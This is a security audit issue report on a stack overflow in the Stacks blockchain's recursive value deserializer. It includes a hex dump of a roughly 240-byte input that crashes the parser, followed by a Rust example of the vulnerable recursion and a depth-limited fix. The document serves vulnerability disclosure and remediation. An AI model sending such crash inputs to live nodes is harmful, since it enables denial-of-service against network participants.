diwakergupta / stacks-blockchain-tob-audit

GNU General Public License v3.0

Stack overflow in `Value::consensus_deserialize` #8

Open smoelius opened 4 years ago

smoelius commented 4 years ago

Value::consensus_deserialize calls Value::deserialize_read, and Value::deserialize_read calls itself here:

https://github.com/trailofbits/x-audit-blockstack-core/blob/e2d3d5bae539d242851620e28129af6c4a9de642/src/vm/types/serialization.rs#L285

However, only one byte has been consumed from the input when the recursive call is made. On the Linux box on which I am performing these experiments, about 240 calls are sufficient to overflow the stack. Thus, a ~240-byte input is sufficient to overflow the stack. The following is an example:

00000000: 0808 0808 0808 0808 0808 0707 0708 0807  ................
00000010: 0808 0808 0808 0807 0808 0808 0807 0808  ................
00000020: 0707 0807 0708 0807 0808 0808 0808 0807  ................
00000030: 0808 0808 0807 0808 0707 0807 0807 0807  ................
00000040: 0808 0808 0808 0807 0808 0808 0807 0808  ................
00000050: 0708 0808 0808 0808 0808 0707 0807 0808  ................
00000060: 0808 0808 0708 0807 0707 0808 0707 0808  ................
00000070: 0708 0808 0808 0708 0807 0708 0708 0708  ................
00000080: 0808 0808 0808 0707 0807 0807 0807 0807  ................
00000090: 0808 0808 0808 0807 0808 0808 0807 0808  ................
000000a0: 0708 0808 0808 0808 0808 0707 0807 0808  ................
000000b0: 0808 0808 0708 0807 0707 0808 0707 0808  ................
000000c0: 0708 0808 0808 0708 0807 0708 0708 0708  ................
000000d0: 0808 0808 0808 0707 0807 0808 0808 0808  ................
000000e0: 0708 0807 0707 0808 0707 0808 0807 0808  ................
000000f0: 0707 0708                                ....
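The pattern the issue describes, and the usual fix, reduced to a toy decoder. This is an added example, not code from the audited project: it assumes a hypothetical encoding in which tag `0x01` introduces a one-byte leaf and tags `0x07` and `0x08` each wrap exactly one nested value, so every wrapper byte costs one recursive call. `decode_unbounded` reproduces the recursion-per-byte structure; `decode_bounded` threads a depth counter and refuses input nested deeper than `MAX_DEPTH` (a limit chosen for this example) before recursing, so stack use stays bounded however long the input is. `nested_input` builds a constructed input of the same shape as the dump above for the bounded decoder's regression test; the unbounded decoder is deliberately never run on it.

```rust
// Added example: toy recursive decoder, not the project's serializer.

/// Decoded value in the hypothetical format (leaf or single-child wrapper).
#[derive(Debug, PartialEq)]
pub enum Value {
    Leaf(u8),
    Wrapped { tag: u8, inner: Box<Value> },
}

#[derive(Debug, PartialEq)]
pub enum DecodeError {
    UnexpectedEof,
    BadTag(u8),
    TooDeep { limit: usize },
}

// Tag bytes assumed for this example only.
const TAG_LEAF: u8 = 0x01;
const TAG_WRAP_A: u8 = 0x07;
const TAG_WRAP_B: u8 = 0x08;

/// Maximum nesting the hardened decoder accepts (chosen for the example).
pub const MAX_DEPTH: usize = 32;

fn read_tag(input: &[u8]) -> Result<u8, DecodeError> {
    input.first().copied().ok_or(DecodeError::UnexpectedEof)
}

/// Vulnerable pattern: every wrapper tag consumes one byte and recurses,
/// so stack depth grows linearly with input length with no upper bound.
pub fn decode_unbounded(input: &[u8]) -> Result<(Value, usize), DecodeError> {
    let tag = read_tag(input)?;
    match tag {
        TAG_LEAF => {
            let payload = *input.get(1).ok_or(DecodeError::UnexpectedEof)?;
            Ok((Value::Leaf(payload), 2))
        }
        TAG_WRAP_A | TAG_WRAP_B => {
            let (inner, used) = decode_unbounded(&input[1..])?;
            Ok((Value::Wrapped { tag, inner: Box::new(inner) }, used + 1))
        }
        other => Err(DecodeError::BadTag(other)),
    }
}

/// Hardened: same grammar, but the recursion carries a depth counter and
/// fails closed once MAX_DEPTH is exceeded, before touching more stack.
pub fn decode_bounded(input: &[u8]) -> Result<(Value, usize), DecodeError> {
    decode_with_depth(input, 0)
}

fn decode_with_depth(input: &[u8], depth: usize) -> Result<(Value, usize), DecodeError> {
    if depth > MAX_DEPTH {
        return Err(DecodeError::TooDeep { limit: MAX_DEPTH });
    }
    let tag = read_tag(input)?;
    match tag {
        TAG_LEAF => {
            let payload = *input.get(1).ok_or(DecodeError::UnexpectedEof)?;
            Ok((Value::Leaf(payload), 2))
        }
        TAG_WRAP_A | TAG_WRAP_B => {
            let (inner, used) = decode_with_depth(&input[1..], depth + 1)?;
            Ok((Value::Wrapped { tag, inner: Box::new(inner) }, used + 1))
        }
        other => Err(DecodeError::BadTag(other)),
    }
}

/// Constructed test input: `n` wrapper bytes (alternating 0x07/0x08, the
/// shape of the issue's dump) followed by a leaf carrying 0x2a.
pub fn nested_input(n: usize) -> Vec<u8> {
    let mut bytes: Vec<u8> = (0..n)
        .map(|i| if i % 2 == 0 { TAG_WRAP_A } else { TAG_WRAP_B })
        .collect();
    bytes.push(TAG_LEAF);
    bytes.push(0x2a);
    bytes
}

/// Number of wrappers around the leaf of a decoded value.
pub fn nesting_depth(v: &Value) -> usize {
    match v {
        Value::Leaf(_) => 0,
        Value::Wrapped { inner, .. } => 1 + nesting_depth(inner),
    }
}

fn main() {
    let shallow = nested_input(3);
    let (v, used) = decode_bounded(&shallow).expect("shallow input decodes");
    println!("decoded {} bytes, nesting depth {}", used, nesting_depth(&v));

    // The 240-wrapper case from the issue is rejected instead of recursing 240 deep.
    match decode_bounded(&nested_input(240)) {
        Err(DecodeError::TooDeep { limit }) => println!("rejected: nesting exceeds {}", limit),
        other => println!("unexpected result: {:?}", other),
    }
}
```

The depth counter is the smallest change that closes the bug; the alternative is to make the decoder iterative with an explicit work stack, which removes the recursion entirely and lets the limit be enforced on heap allocation rather than stack frames. Either way, the limit belongs in the decoder itself, not in callers, since `consensus_deserialize` is reached from network input.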